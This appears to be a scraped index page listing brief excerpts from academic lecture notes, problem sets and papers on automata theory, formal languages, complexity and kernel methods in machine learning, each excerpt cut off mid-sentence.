Economics 204 Fall 2012 Problem Set 3 Suggested Solutions 1. Give an example of each of the following (and prove that your example indeed works): (a) A complete metric space that is bounded but not compact.
More informationKaggle.
Administrivia Mini-project 2 due April 7, in class implement multi-class reductions, naive bayes, kernel perceptron, multi-class logistic regression and two layer neural networks training set: Project
More informationComputational Models - Lecture 5 1
Computational Models - Lecture 5 1 Handout Mode Iftach Haitner. Tel Aviv University. November 28, 2016 1 Based on frames by Benny Chor, Tel Aviv University, modifying frames by Maurice Herlihy, Brown University.
More informationAutomata Theory and Formal Grammars: Lecture 1
Automata Theory and Formal Grammars: Lecture 1 Sets, Languages, Logic Automata Theory and Formal Grammars: Lecture 1 p.1/72 Sets, Languages, Logic Today Course Overview Administrivia Sets Theory (Review?)
More informationProperties of Context-free Languages. Reading: Chapter 7
Properties of Context-free Languages Reading: Chapter 7 1 Topics 1) Simplifying CFGs, Normal forms 2) Pumping lemma for CFLs 3) Closure and decision properties of CFLs 2 How to simplify CFGs? 3 Three ways
More informationEdge Isoperimetric Theorems for Integer Point Arrays
Edge Isoperimetric Theorems for Integer Point Arrays R. Ahlswede, S.L. Bezrukov Universität Bielefeld, Fakultät für Mathematik Postfach 100131, 33501 Bielefeld, Germany Abstract We consider subsets of
More informationMATH 31BH Homework 1 Solutions
MATH 3BH Homework Solutions January 0, 04 Problem.5. (a) (x, y)-plane in R 3 is closed and not open. To see that this plane is not open, notice that any ball around the origin (0, 0, 0) will contain points
More informationSets are one of the basic building blocks for the types of objects considered in discrete mathematics.
Section 2.1 Introduction Sets are one of the basic building blocks for the types of objects considered in discrete mathematics. Important for counting. Programming languages have set operations. Set theory
More informationEven More on Dynamic Programming
Algorithms & Models of Computation CS/ECE 374, Fall 2017 Even More on Dynamic Programming Lecture 15 Thursday, October 19, 2017 Sariel Har-Peled (UIUC) CS374 1 Fall 2017 1 / 26 Part I Longest Common Subsequence
More informationClosure Properties of Regular Languages. Union, Intersection, Difference, Concatenation, Kleene Closure, Reversal, Homomorphism, Inverse Homomorphism
Closure Properties of Regular Languages Union, Intersection, Difference, Concatenation, Kleene Closure, Reversal, Homomorphism, Inverse Homomorphism Closure Properties Recall a closure property is a statement
More informationFinal. Introduction to Artificial Intelligence. CS 188 Spring You have approximately 2 hours and 50 minutes.
CS 188 Spring 2014 Introduction to Artificial Intelligence Final You have approximately 2 hours and 50 minutes. The exam is closed book, closed notes except your two-page crib sheet. Mark your answers
More informationProblem Set 2: Solutions Math 201A: Fall 2016
Problem Set 2: s Math 201A: Fall 2016 Problem 1. (a) Prove that a closed subset of a complete metric space is complete. (b) Prove that a closed subset of a compact metric space is compact. (c) Prove that
More informationCSCI 2200 Foundations of Computer Science Spring 2018 Quiz 3 (May 2, 2018) SOLUTIONS
CSCI 2200 Foundations of Computer Science Spring 2018 Quiz 3 (May 2, 2018) SOLUTIONS 1. [6 POINTS] For language L 1 = {0 n 1 m n, m 1, m n}, which string is in L 1? ANSWER: 0001111 is in L 1 (with n =
More informationFall, 2017 CIS 262. Automata, Computability and Complexity Jean Gallier Solutions of the Practice Final Exam
Fall, 2017 CIS 262 Automata, Computability and Complexity Jean Gallier Solutions of the Practice Final Exam December 6, 2017 Problem 1 (10 pts). Let Σ be an alphabet. (1) What is an ambiguous context-free
More informationA Result of Vapnik with Applications
A Result of Vapnik with Applications Martin Anthony Department of Statistical and Mathematical Sciences London School of Economics Houghton Street London WC2A 2AE, U.K. John Shawe-Taylor Department of
More informationComputational Models #1
Computational Models #1 Handout Mode Nachum Dershowitz & Yishay Mansour March 13-15, 2017 Nachum Dershowitz & Yishay Mansour Computational Models #1 March 13-15, 2017 1 / 41 Lecture Outline I Motivation
More informationLecture Notes On THEORY OF COMPUTATION MODULE -1 UNIT - 2
BIJU PATNAIK UNIVERSITY OF TECHNOLOGY, ODISHA Lecture Notes On THEORY OF COMPUTATION MODULE -1 UNIT - 2 Prepared by, Dr. Subhendu Kumar Rath, BPUT, Odisha. UNIT 2 Structure NON-DETERMINISTIC FINITE AUTOMATA
More informationComputational Models - Lecture 4 1
Computational Models - Lecture 4 1 Handout Mode Iftach Haitner and Yishay Mansour. Tel Aviv University. April 3/8, 2013 1 Based on frames by Benny Chor, Tel Aviv University, modifying frames by Maurice
More informationSection 1.3 Ordered Structures
Section 1.3 Ordered Structures Tuples Have order and can have repetitions. (6,7,6) is a 3-tuple () is the empty tuple A 2-tuple is called a pair and a 3-tuple is called a triple. We write (x 1,, x n )
More informationCSci 311, Models of Computation Chapter 4 Properties of Regular Languages
CSci 311, Models of Computation Chapter 4 Properties of Regular Languages H. Conrad Cunningham 29 December 2015 Contents Introduction................................. 1 4.1 Closure Properties of Regular
More informationSection 1 (closed-book) Total points 30
CS 454 Theory of Computation Fall 2011 Section 1 (closed-book) Total points 30 1. Which of the following are true? (a) a PDA can always be converted to an equivalent PDA that at each step pops or pushes
More information1 More finite deterministic automata
CS 125 Section #6 Finite automata October 18, 2016 1 More finite deterministic automata Exercise. Consider the following game with two players: Repeatedly flip a coin. On heads, player 1 gets a point.
More informationOn the Sizes of Decision Diagrams Representing the Set of All Parse Trees of a Context-free Grammar
Proceedings of Machine Learning Research vol 73:153-164, 2017 AMBN 2017 On the Sizes of Decision Diagrams Representing the Set of All Parse Trees of a Context-free Grammar Kei Amii Kyoto University Kyoto
More informationCS6901: review of Theory of Computation and Algorithms
CS6901: review of Theory of Computation and Algorithms Any mechanically (automatically) discretely computation of problem solving contains at least three components: - problem description - computational
More informationComplexity Theory VU , SS The Polynomial Hierarchy. Reinhard Pichler
Complexity Theory Complexity Theory VU 181.142, SS 2018 6. The Polynomial Hierarchy Reinhard Pichler Institut für Informationssysteme Arbeitsbereich DBAI Technische Universität Wien 15 May, 2018 Reinhard
More informationWhat Is a Language? Grammars, Languages, and Machines. Strings: the Building Blocks of Languages
Do Homework 2. What Is a Language? Grammars, Languages, and Machines L Language Grammar Accepts Machine Strings: the Building Blocks of Languages An alphabet is a finite set of symbols: English alphabet:
More informationOutline. Complexity Theory EXACT TSP. The Class DP. Definition. Problem EXACT TSP. Complexity of EXACT TSP. Proposition VU 181.
Complexity Theory Complexity Theory Outline Complexity Theory VU 181.142, SS 2018 6. The Polynomial Hierarchy Reinhard Pichler Institut für Informationssysteme Arbeitsbereich DBAI Technische Universität
More informationarxiv: v1 [cs.ds] 9 Apr 2018
From Regular Expression Matching to Parsing Philip Bille Technical University of Denmark phbi@dtu.dk Inge Li Gørtz Technical University of Denmark inge@dtu.dk arxiv:1804.02906v1 [cs.ds] 9 Apr 2018 Abstract
More informationCSE 202 Homework 4 Matthias Springer, A
CSE 202 Homework 4 Matthias Springer, A99500782 1 Problem 2 Basic Idea PERFECT ASSEMBLY N P: a permutation P of s i S is a certificate that can be checked in polynomial time by ensuring that P = S, and
More informationHarvard CS 121 and CSCI E-207 Lecture 10: CFLs: PDAs, Closure Properties, and Non-CFLs
Harvard CS 121 and CSCI E-207 Lecture 10: CFLs: PDAs, Closure Properties, and Non-CFLs Harry Lewis October 8, 2013 Reading: Sipser, pp. 119-128. Pushdown Automata (review) Pushdown Automata = Finite automaton
More informationMachine Learning: The Perceptron. Lecture 06
Machine Learning: he Perceptron Razvan C. Bunescu School of Electrical Engineering and Computer Science bunescu@ohio.edu 1 McCulloch-Pitts Neuron Function 0 1 w 0 activation / output function 1 w 1 w w
More informationCS 455/555: Mathematical preliminaries
CS 455/555: Mathematical preliminaries Stefan D. Bruda Winter 2019 SETS AND RELATIONS Sets: Operations: intersection, union, difference, Cartesian product Big, powerset (2 A ) Partition (π 2 A, π, i j
More informationMapping kernels defined over countably infinite mapping systems and their application
Journal of Machine Learning Research 20 (2011) 367 382 Asian Conference on Machine Learning Mapping kernels defined over countably infinite mapping systems and their application Kilho Shin yshin@ai.u-hyogo.ac.jp
More informationCS3719 Theory of Computation and Algorithms
CS3719 Theory of Computation and Algorithms Any mechanically (automatically) discretely computation of problem solving contains at least three components: - problem description - computational tool - analysis
More informationChapter Summary. Sets The Language of Sets Set Operations Set Identities Functions Types of Functions Operations on Functions Computability
Chapter 2 1 Chapter Summary Sets The Language of Sets Set Operations Set Identities Functions Types of Functions Operations on Functions Computability Sequences and Summations Types of Sequences Summation
More informationAutomata and Languages
Automata and Languages Prof. Mohamed Hamada Software Engineering Lab. The University of Aizu Japan Mathematical Background Mathematical Background Sets Relations Functions Graphs Proof techniques Sets
More informationFast Kernels for String and Tree Matching
Fast Kernels for String and Tree Matching S. V. N. Vishwanathan Dept. of Comp. Sci. & Automation Indian Institute of Science Bangalore, 560012, India vishy@csa.iisc.ernet.in Alexander J. Smola Machine
More informationAutomata & languages. A primer on the Theory of Computation. Laurent Vanbever. ETH Zürich (D-ITET) October,
Automata & languages A primer on the Theory of Computation Laurent Vanbever www.vanbever.eu ETH Zürich (D-ITET) October, 5 2017 Part 3 out of 5 Last week, we learned about closure and equivalence of regular
More informationPart 3 out of 5. Automata & languages. A primer on the Theory of Computation. Last week, we learned about closure and equivalence of regular languages
Automata & languages A primer on the Theory of Computation Laurent Vanbever www.vanbever.eu Part 3 out of 5 ETH Zürich (D-ITET) October, 5 2017 Last week, we learned about closure and equivalence of regular
More informationInformation Theory and Statistics Lecture 2: Source coding
Information Theory and Statistics Lecture 2: Source coding Łukasz Dębowski ldebowsk@ipipan.waw.pl Ph. D. Programme 2013/2014 Injections and codes Definition (injection) Function f is called an injection
More informationPartial cubes: structures, characterizations, and constructions
Partial cubes: structures, characterizations, and constructions Sergei Ovchinnikov San Francisco State University, Mathematics Department, 1600 Holloway Ave., San Francisco, CA 94132 Abstract Partial cubes
More informationSupport Vector Machines (SVM) in bioinformatics. Day 1: Introduction to SVM
1 Support Vector Machines (SVM) in bioinformatics Day 1: Introduction to SVM Jean-Philippe Vert Bioinformatics Center, Kyoto University, Japan Jean-Philippe.Vert@mines.org Human Genome Center, University
More informationWith Question/Answer Animations. Chapter 2
With Question/Answer Animations Chapter 2 Chapter Summary Sets The Language of Sets Set Operations Set Identities Functions Types of Functions Operations on Functions Sequences and Summations Types of
More informationEinführung in die Computerlinguistik
Einführung in die Computerlinguistik Context-Free Grammars (CFG) Laura Kallmeyer Heinrich-Heine-Universität Düsseldorf Summer 2016 1 / 22 CFG (1) Example: Grammar G telescope : Productions: S NP VP NP
More informationBefore We Start. The Pumping Lemma. Languages. Context Free Languages. Plan for today. Now our picture looks like. Any questions?
Before We Start The Pumping Lemma Any questions? The Lemma & Decision/ Languages Future Exam Question What is a language? What is a class of languages? Context Free Languages Context Free Languages(CFL)
More informationKernel Methods & Support Vector Machines
Kernel Methods & Support Vector Machines Mahdi pakdaman Naeini PhD Candidate, University of Tehran Senior Researcher, TOSAN Intelligent Data Miners Outline Motivation Introduction to pattern recognition
More informationMathematics 114L Spring 2018 D.A. Martin. Mathematical Logic
Mathematics 114L Spring 2018 D.A. Martin Mathematical Logic 1 First-Order Languages. Symbols. All first-order languages we consider will have the following symbols: (i) variables v 1, v 2, v 3,... ; (ii)
More informationKernel methods, kernel SVM and ridge regression
Kernel methods, kernel SVM and ridge regression Le Song Machine Learning II: Advanced Topics CSE 8803ML, Spring 2012 Collaborative Filtering 2 Collaborative Filtering R: rating matrix; U: user factor;
More informationLecture 7 Properties of regular languages
Lecture 7 Properties of regular languages COT 4420 Theory of Computation Section 4.1 Closure properties of regular languages If L 1 and L 2 are regular languages, then we prove that: Union: L 1 L 2 Concatenation:
More information